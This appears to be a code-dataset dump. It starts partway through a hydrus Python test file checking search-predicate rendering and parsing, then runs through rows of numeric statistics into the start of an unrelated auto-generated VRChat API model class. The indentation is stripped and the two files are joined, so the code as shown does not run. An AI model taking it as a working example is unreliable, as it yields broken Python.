p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'tag', False )
self.assertEqual( p.ToString(), '-tag' )
self.assertEqual( p.GetNamespace(), '' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'tag', False, count = ClientSearch.PredicateCount.STATICCreateStaticCount( 1, 2 ) )
self.assertEqual( p.ToString( with_count = False ), '-tag' )
self.assertEqual( p.ToString( with_count = True ), '-tag (1) (+2)' )
self.assertEqual( p.GetNamespace(), '' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
#
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_AGE, ( '<', 'delta', ( 1, 2, 3, 4 ) ) )
self.assertEqual( p.ToString(), 'system:import time: since 1 year 2 months ago' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_AGE, ( CC.UNICODE_ALMOST_EQUAL_TO, 'delta', ( 1, 2, 3, 4 ) ) )
self.assertEqual( p.ToString(), 'system:import time: around 1 year 2 months ago' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_AGE, ( '>', 'delta', ( 1, 2, 3, 4 ) ) )
self.assertEqual( p.ToString(), 'system:import time: before 1 year 2 months ago' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_ARCHIVE, count = ClientSearch.PredicateCount.STATICCreateCurrentCount( 1000 ) )
self.assertEqual( p.ToString(), 'system:archive (1,000)' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_DURATION, ( '<', 200 ) )
self.assertEqual( p.ToString(), 'system:duration < 200 milliseconds' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_EVERYTHING, count = ClientSearch.PredicateCount.STATICCreateCurrentCount( 2000 ) )
self.assertEqual( p.ToString(), 'system:everything (2,000)' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_FILE_SERVICE, ( True, HC.CONTENT_STATUS_CURRENT, CC.LOCAL_FILE_SERVICE_KEY ) )
self.assertEqual( p.ToString(), 'system:is currently in my files' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_FILE_SERVICE, ( True, HC.CONTENT_STATUS_DELETED, CC.LOCAL_FILE_SERVICE_KEY ) )
self.assertEqual( p.ToString(), 'system:is deleted from my files' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_FILE_SERVICE, ( False, HC.CONTENT_STATUS_PENDING, CC.LOCAL_FILE_SERVICE_KEY ) )
self.assertEqual( p.ToString(), 'system:is not pending to my files' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_FILE_SERVICE, ( False, HC.CONTENT_STATUS_PETITIONED, CC.LOCAL_FILE_SERVICE_KEY ) )
self.assertEqual( p.ToString(), 'system:is not petitioned from my files' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_HAS_AUDIO, True )
self.assertEqual( p.ToString(), 'system:has audio' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_HAS_AUDIO, False )
self.assertEqual( p.ToString(), 'system:no audio' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_HAS_ICC_PROFILE, True )
self.assertEqual( p.ToString(), 'system:has icc profile' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_HAS_ICC_PROFILE, False )
self.assertEqual( p.ToString(), 'system:no icc profile' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_HASH, ( ( bytes.fromhex( 'abcd' ), ), 'sha256' ) )
self.assertEqual( p.ToString(), 'system:sha256 hash is abcd' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_HEIGHT, ( '<', 2000 ) )
self.assertEqual( p.ToString(), 'system:height < 2,000' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_INBOX, count = ClientSearch.PredicateCount.STATICCreateCurrentCount( 1000 ) )
self.assertEqual( p.ToString(), 'system:inbox (1,000)' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_LIMIT, 2000 )
self.assertEqual( p.ToString(), 'system:limit is 2,000' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_LOCAL, count = ClientSearch.PredicateCount.STATICCreateCurrentCount( 100 ) )
self.assertEqual( p.ToString(), 'system:local (100)' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_MIME, set( HC.IMAGES ).intersection( HC.SEARCHABLE_MIMES ) )
self.assertEqual( p.ToString(), 'system:filetype is image' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_MIME, ( HC.VIDEO_WEBM, ) )
self.assertEqual( p.ToString(), 'system:filetype is webm' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_MIME, ( HC.VIDEO_WEBM, HC.IMAGE_GIF ) )
self.assertEqual( p.ToString(), 'system:filetype is webm, gif' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_NOT_LOCAL, count = ClientSearch.PredicateCount.STATICCreateCurrentCount( 100 ) )
self.assertEqual( p.ToString(), 'system:not local (100)' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_NUM_TAGS, ( None, '<', 2 ) )
self.assertEqual( p.ToString(), 'system:number of tags < 2' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_NUM_TAGS, ( 'character', '<', 2 ) )
self.assertEqual( p.ToString(), 'system:number of character tags < 2' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_NUM_WORDS, ( '<', 5000 ) )
self.assertEqual( p.ToString(), 'system:number of words < 5,000' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
from hydrus.test import TestController
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_RATING, ( '>', 0.2, TestController.LOCAL_RATING_NUMERICAL_SERVICE_KEY ) )
self.assertEqual( p.ToString(), 'system:rating for example local rating numerical service > 1/5' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_RATIO, ( '=', 16, 9 ) )
self.assertEqual( p.ToString(), 'system:ratio = 16:9' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_SIMILAR_TO, ( ( bytes.fromhex( 'abcd' ), ), 5 ) )
self.assertEqual( p.ToString(), 'system:similar to 1 files using max hamming of 5' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_SIZE, ( '>', 5, 1048576 ) )
self.assertEqual( p.ToString(), 'system:filesize > 5MB' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_WIDTH, ( '=', 1920 ) )
self.assertEqual( p.ToString(), 'system:width = 1,920' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
#
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'series' )
self.assertEqual( p.ToString(), 'series:*anything*' )
self.assertEqual( p.GetNamespace(), 'series' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'series', False )
self.assertEqual( p.ToString(), '-series' )
self.assertEqual( p.GetNamespace(), '' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
#
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 'a*i:o*' )
self.assertEqual( p.ToString(), 'a*i:o* (wildcard search)' )
self.assertEqual( p.GetNamespace(), 'a*i' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'a*i:o*', False )
self.assertEqual( p.ToString(), '-a*i:o*' )
self.assertEqual( p.GetNamespace(), 'a*i' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
#
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_PARENT, 'series:game of thrones' )
self.assertEqual( p.ToString(), ' series:game of thrones' )
self.assertEqual( p.GetNamespace(), 'series' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
#
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_OR_CONTAINER, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_HEIGHT, ( '<', 2000 ) ), ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'blue eyes' ), ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' ) ] )
self.assertEqual( p.ToString(), 'system:height < 2,000 OR blue eyes OR character:samus aran' )
self.assertEqual( p.GetNamespace(), '' )
or_texts_and_namespaces = []
or_texts_and_namespaces.append( ( 'system:height < 2,000', 'system' ) )
or_texts_and_namespaces.append( ( ' OR ', 'system' ) )
or_texts_and_namespaces.append( ( 'blue eyes', '' ) )
or_texts_and_namespaces.append( ( ' OR ', 'system' ) )
or_texts_and_namespaces.append( ( 'character:samus aran', 'character' ) )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), or_texts_and_namespaces )
def test_system_predicate_parsing( self ):
for ( expected_result_text, sys_pred_text ) in [
( 'system:everything', "system:everything" ),
( 'system:inbox', "system:inbox " ),
( 'system:archive', "system:archive " ),
( 'system:has duration', "system:has duration" ),
( 'system:has duration', "system:has_duration" ),
( 'system:no duration', " system:no_duration" ),
( 'system:no duration', "system:no duration" ),
( 'system:is the best quality file of its duplicate group', "system:is the best quality file of its group" ),
( 'system:is not the best quality file of its duplicate group', "system:isn't the best quality file of its duplicate group" ),
( 'system:is not the best quality file of its duplicate group', 'system:is not the best quality file of its duplicate group' ),
( 'system:has audio', "system:has_audio" ),
( 'system:no audio', "system:no audio" ),
( 'system:has tags', "system:has tags" ),
( 'system:untagged', "system:no tags" ),
( 'system:untagged', "system:untagged" ),
( 'system:number of tags > 5', "system:number of tags > 5" ),
( 'system:number of tags \u2248 10', "system:number of tags ~= 10" ),
( 'system:has tags', "system:number of tags > 0 " ),
( 'system:number of words < 2', "system:number of words < 2" ),
( 'system:height = 600', "system:height = 600px" ),
( 'system:height = 800', "system:height is 800" ),
( 'system:height > 900', "system:height > 900" ),
( 'system:width < 200', "system:width < 200" ),
( 'system:width > 1,000', "system:width > 1000 pixels" ),
( 'system:filesize \u2248 50KB', "system:filesize ~= 50 kilobytes" ),
( 'system:filesize > 10MB', "system:filesize > 10megabytes" ),
( 'system:filesize < 1GB', "system:file size < 1 GB" ),
( 'system:filesize > 0B', "system:file size > 0 B" ),
( 'system:similar to 4 files using max hamming of 3', "system:similar to abcdef01 abcdef02 abcdef03, abcdef04 with distance 3" ),
( 'system:similar to 1 files using max hamming of 5', "system:similar to abcdef distance 5" ),
( 'system:limit is 5,000', "system:limit is 5000" ),
( 'system:limit is 100', "system:limit = 100" ),
( 'system:filetype is jpeg', "system:filetype is jpeg" ),
( 'system:filetype is jpeg, png, apng', "system:filetype = image/jpg, image/png, apng" ),
( 'system:sha256 hash is in 3 hashes', "system:hash = abcdef01 abcdef02 abcdef03" ),
( 'system:md5 hash is in 3 hashes', "system:hash = abcdef01 abcdef, abcdef04 md5" ),
( 'system:md5 hash is abcdef01', "system:hash = abcdef01 md5" ),
( 'system:md5 hash is abcdef01', "system:Hash = Abcdef01 md5" ),
( 'system:md5 hash is not abcdef01', "system:Hash != Abcdef01 md5" ),
( 'system:md5 hash is not abcdef01', "system:Hash is not Abcdef01 md5" ),
( 'system:sha256 hash is abcdef0102', "system:hash = abcdef0102" ),
( 'system:modified time: since 7 years 1 month ago', "system:modified date < 7 years 45 days 70h" ),
( 'system:modified time: since 2011-06-04', "system:modified date > 2011-06-04" ),
( 'system:modified time: before 7 years 2 months ago', "system:date modified > 7 years 2 months" ),
( 'system:modified time: since 1 day ago', "system:date modified < 1 day" ),
( 'system:modified time: since 1 month 1 day ago', "system:date modified < 0 years 1 month 1 day 1 hour" ),
( 'system:last view time: since 7 years 1 month ago', "system:last viewed time < 7 years 45 days 70h" ),
( 'system:last view time: since 7 years 1 month ago', "system:last view time < 7 years 45 days 70h" ),
( 'system:import time: since 7 years 1 month ago', "system:time_imported < 7 years 45 days 70h" ),
( 'system:import time: since 2011-06-04', "system:time imported > 2011-06-04" ),
( 'system:import time: before 7 years 2 months ago', "system:time imported > 7 years 2 months" ),
( 'system:import time: since 1 day ago', "system:time imported < 1 day" ),
( 'system:import time: since 1 month 1 day ago', "system:time imported < 0 years 1 month 1 day 1 hour" ),
( 'system:import time: a month either side of 2011-01-03', " system:time imported ~= 2011-1-3 " ),
( 'system:import time: a month either side of 1996-05-02', "system:time imported ~= 1996-05-2" ),
( 'system:import time: since 7 years 1 month ago', "system:import_time < 7 years 45 days 70h" ),
( 'system:import time: since 2011-06-04', "system:import time > 2011-06-04" ),
( 'system:import time: before 7 years 2 months ago', "system:import time > 7 years 2 months" ),
( 'system:import time: since 1 day ago', "system:import time < 1 day" ),
( 'system:import time: since 1 month 1 day ago', "system:import time < 0 years 1 month 1 day 1 hour" ),
( 'system:import time: a month either side of 2011-01-03', " system:import time ~= 2011-1-3 " ),
( 'system:import time: a month either side of 1996-05-02', "system:import time ~= 1996-05-2" ),
( 'system:duration < 5.0 seconds', "system:duration < 5 seconds" ),
( 'system:duration \u2248 11.0 seconds', "system:duration ~= 5 sec 6000 msecs" ),
( 'system:duration > 3 milliseconds', "system:duration > 3 milliseconds" ),
( 'system:is pending to my files', "system:file service is pending to my files" ),
( 'system:is currently in my files', " system:file service currently in my files" ),
( 'system:is not currently in my files', "system:file service isn't currently in my files" ),
( 'system:is not pending to my files', "system:file service is not pending to my files" ),
( 'system:num file relationships - has less than 3 alternates', "system:num file relationships < 3 alternates" ),
( 'system:num file relationships - has more than 3 not related/false positive', "system:number of file relationships > 3 false positives" ),
( 'system:ratio wider than 16:9', "system:ratio is wider than 16:9 " ),
( 'system:ratio = 16:9', "system:ratio is 16:9" ),
( 'system:ratio taller than 1:1', "system:ratio taller than 1:1" ),
( 'system:number of pixels > 50 pixels', "system:num pixels > 50 px" ),
( 'system:number of pixels < 1 megapixels', "system:num pixels < 1 megapixels " ),
( 'system:number of pixels \u2248 5 kilopixels', "system:num pixels ~= 5 kilopixel" ),
( 'system:media views \u2248 10', "system:media views ~= 10" ),
( 'system:all views > 0', "system:all views > 0" ),
( 'system:preview views < 10', "system:preview views < 10 " ),
( 'system:media viewtime < 1 day 1 hour', "system:media viewtime < 1 days 1 hour 0 minutes" ),
( 'system:all viewtime > 1 hour 1 minute', "system:all viewtime > 1 hours 100 seconds" ),
( 'system:preview viewtime \u2248 2 days 7 hours', "system:preview viewtime ~= 1 day 30 hours 100 minutes 90s" ),
( 'system:has a url matching regex: index\\.php', " system:has url matching regex index\\.php" ),
( 'system:does not have a url matching regex: index\\.php', "system:does not have a url matching regex index\\.php" ),
( 'system:has url: https://safebooru.donmai.us/posts/4695284', "system:has_url https://safebooru.donmai.us/posts/4695284" ),
( 'system:does not have url: https://safebooru.donmai.us/posts/4695284', " system:doesn't have url https://safebooru.donmai.us/posts/4695284 " ),
( 'system:has a url with domain: safebooru.com', "system:has domain safebooru.com" ),
( 'system:does not have a url with domain: safebooru.com', "system:doesn't have domain safebooru.com" ),
( 'system:has safebooru file page url', "system:has a url with class safebooru file page" ),
( 'system:does not have safebooru file page url', "system:doesn't have a url with url class safebooru file page " ),
( 'system:page less than 5', "system:tag as number page < 5" )
]:
( sys_pred, ) = ClientSearchParseSystemPredicates.ParseSystemPredicateStringsToPredicates( ( sys_pred_text, ) )
self.assertEqual( sys_pred.ToString(), expected_result_text )
def test_tag_import_options_simple( self ):
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
self.assertTrue( tag_autocomplete_options.FetchResultsAutomatically() )
self.assertEqual( tag_autocomplete_options.GetExactMatchCharacterThreshold(), 2 )
#
tag_autocomplete_options.SetFetchResultsAutomatically( False )
self.assertFalse( tag_autocomplete_options.FetchResultsAutomatically() )
tag_autocomplete_options.SetFetchResultsAutomatically( True )
self.assertTrue( tag_autocomplete_options.FetchResultsAutomatically() )
tag_autocomplete_options.SetExactMatchCharacterThreshold( None )
self.assertEqual( tag_autocomplete_options.GetExactMatchCharacterThreshold(), None )
tag_autocomplete_options.SetExactMatchCharacterThreshold( 2 )
self.assertEqual( tag_autocomplete_options.GetExactMatchCharacterThreshold(), 2 )
| 65.495923
| 336
| 0.70579
| 14,275
| 136,559
| 6.396427
| 0.031734
| 0.087067
| 0.059107
| 0.06858
| 0.935143
| 0.917697
| 0.906033
| 0.880844
| 0.868129
| 0.855677
| 0
| 0.007795
| 0.202425
| 136,559
| 2,084
| 337
| 65.527351
| 0.830548
| 0.000249
| 0
| 0.628592
| 0
| 0
| 0.088927
| 0
| 0
| 0
| 0
| 0
| 0.402299
| 1
| 0.023707
| false
| 0
| 0.024425
| 0
| 0.051006
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
737ec87e3c0e0dead81276c4cb3019c85a79510f
| 53,206
|
py
|
Python
|
vrchatapi/model/api_config.py
|
vrchatapi/vrchatapi-python
|
996b7ddf2914059f1fd4e5def5e3555e678634c0
|
[
"MIT"
] | 8
|
2021-08-25T02:35:30.000Z
|
2022-03-28T18:11:58.000Z
|
vrchatapi/model/api_config.py
|
vrchatapi/vrchatapi-python
|
996b7ddf2914059f1fd4e5def5e3555e678634c0
|
[
"MIT"
] | 1
|
2022-03-18T20:29:30.000Z
|
2022-03-18T20:35:05.000Z
|
vrchatapi/model/api_config.py
|
vrchatapi/vrchatapi-python
|
996b7ddf2914059f1fd4e5def5e3555e678634c0
|
[
"MIT"
] | 1
|
2022-01-11T10:49:12.000Z
|
2022-01-11T10:49:12.000Z
|
"""
VRChat API Documentation
The version of the OpenAPI document: 1.6.7
Contact: me@ruby.js.org
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from vrchatapi.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from vrchatapi.exceptions import ApiAttributeError
def lazy_import():
from vrchatapi.model.api_event_config import APIEventConfig
from vrchatapi.model.avatar_id import AvatarID
from vrchatapi.model.deployment_group import DeploymentGroup
from vrchatapi.model.download_url_list import DownloadURLList
from vrchatapi.model.dynamic_content_row import DynamicContentRow
from vrchatapi.model.public_announcement import PublicAnnouncement
from vrchatapi.model.world_id import WorldID
globals()['APIEventConfig'] = APIEventConfig
globals()['AvatarID'] = AvatarID
globals()['DeploymentGroup'] = DeploymentGroup
globals()['DownloadURLList'] = DownloadURLList
globals()['DynamicContentRow'] = DynamicContentRow
globals()['PublicAnnouncement'] = PublicAnnouncement
globals()['WorldID'] = WorldID
class APIConfig(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
('address',): {
'min_length': 1,
},
('announcements',): {
'min_items': 1,
},
('api_key',): {
'min_length': 1,
},
('app_name',): {
'min_length': 1,
},
('build_version_tag',): {
'min_length': 1,
},
('client_api_key',): {
'min_length': 1,
},
('contact_email',): {
'min_length': 1,
},
('copyright_email',): {
'min_length': 1,
},
('current_tos_version',): {
'inclusive_minimum': 0,
},
('dev_app_version_standalone',): {
'min_length': 1,
},
('dev_download_link_windows',): {
'min_length': 1,
},
('dev_sdk_url',): {
'min_length': 1,
},
('dev_sdk_version',): {
'min_length': 1,
},
('dev_server_version_standalone',): {
'min_length': 1,
},
('download_link_windows',): {
'min_length': 1,
},
('dynamic_world_rows',): {
'min_items': 1,
},
('gear_demo_room_id',): {
'min_length': 1,
},
('homepage_redirect_target',): {
'min_length': 1,
},
('jobs_email',): {
'min_length': 1,
},
('message_of_the_day',): {
'min_length': 1,
},
('moderation_email',): {
'min_length': 1,
},
('not_allowed_to_select_avatar_in_private_world_message',): {
'min_length': 1,
},
('plugin',): {
'min_length': 1,
},
('release_app_version_standalone',): {
'min_length': 1,
},
('release_sdk_url',): {
'min_length': 1,
},
('release_sdk_version',): {
'min_length': 1,
},
('release_server_version_standalone',): {
'min_length': 1,
},
('sdk_developer_faq_url',): {
'min_length': 1,
},
('sdk_discord_url',): {
'min_length': 1,
},
('sdk_not_allowed_to_publish_message',): {
'min_length': 1,
},
('sdk_unity_version',): {
'min_length': 1,
},
('server_name',): {
'min_length': 1,
},
('support_email',): {
'min_length': 1,
},
('vive_windows_url',): {
'min_length': 1,
},
('youtubedl_hash',): {
'min_length': 1,
},
('youtubedl_version',): {
'min_length': 1,
},
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'voice_enable_degradation': (bool,), # noqa: E501
'voice_enable_receiver_limiting': (bool,), # noqa: E501
'address': (str,), # noqa: E501
'announcements': ([PublicAnnouncement],), # noqa: E501
'api_key': (str,), # noqa: E501
'app_name': (str,), # noqa: E501
'build_version_tag': (str,), # noqa: E501
'client_api_key': (str,), # noqa: E501
'client_bps_ceiling': (int,), # noqa: E501
'client_disconnect_timeout': (int,), # noqa: E501
'client_reserved_player_bps': (int,), # noqa: E501
'client_sent_count_allowance': (int,), # noqa: E501
'contact_email': (str,), # noqa: E501
'copyright_email': (str,), # noqa: E501
'current_tos_version': (int,), # noqa: E501
'default_avatar': (AvatarID,), # noqa: E501
'deployment_group': (DeploymentGroup,), # noqa: E501
'dev_app_version_standalone': (str,), # noqa: E501
'dev_download_link_windows': (str,), # noqa: E501
'dev_sdk_url': (str,), # noqa: E501
'dev_sdk_version': (str,), # noqa: E501
'dev_server_version_standalone': (str,), # noqa: E501
'dis_countdown': (datetime,), # noqa: E501
'disable_avatar_copying': (bool,), # noqa: E501
'disable_avatar_gating': (bool,), # noqa: E501
'disable_community_labs': (bool,), # noqa: E501
'disable_community_labs_promotion': (bool,), # noqa: E501
'disable_email': (bool,), # noqa: E501
'disable_event_stream': (bool,), # noqa: E501
'disable_feedback_gating': (bool,), # noqa: E501
'disable_frontend_builds': (bool,), # noqa: E501
'disable_hello': (bool,), # noqa: E501
'disable_oculus_subs': (bool,), # noqa: E501
'disable_registration': (bool,), # noqa: E501
'disable_steam_networking': (bool,), # noqa: E501
'disable_two_factor_auth': (bool,), # noqa: E501
'disable_udon': (bool,), # noqa: E501
'disable_upgrade_account': (bool,), # noqa: E501
'download_link_windows': (str,), # noqa: E501
'download_urls': (DownloadURLList,), # noqa: E501
'dynamic_world_rows': ([DynamicContentRow],), # noqa: E501
'events': (APIEventConfig,), # noqa: E501
'gear_demo_room_id': (str,), # noqa: E501
'home_world_id': (WorldID,), # noqa: E501
'homepage_redirect_target': (str,), # noqa: E501
'hub_world_id': (WorldID,), # noqa: E501
'jobs_email': (str,), # noqa: E501
'message_of_the_day': (str,), # noqa: E501
'moderation_email': (str,), # noqa: E501
'moderation_query_period': (int,), # noqa: E501
'not_allowed_to_select_avatar_in_private_world_message': (str,), # noqa: E501
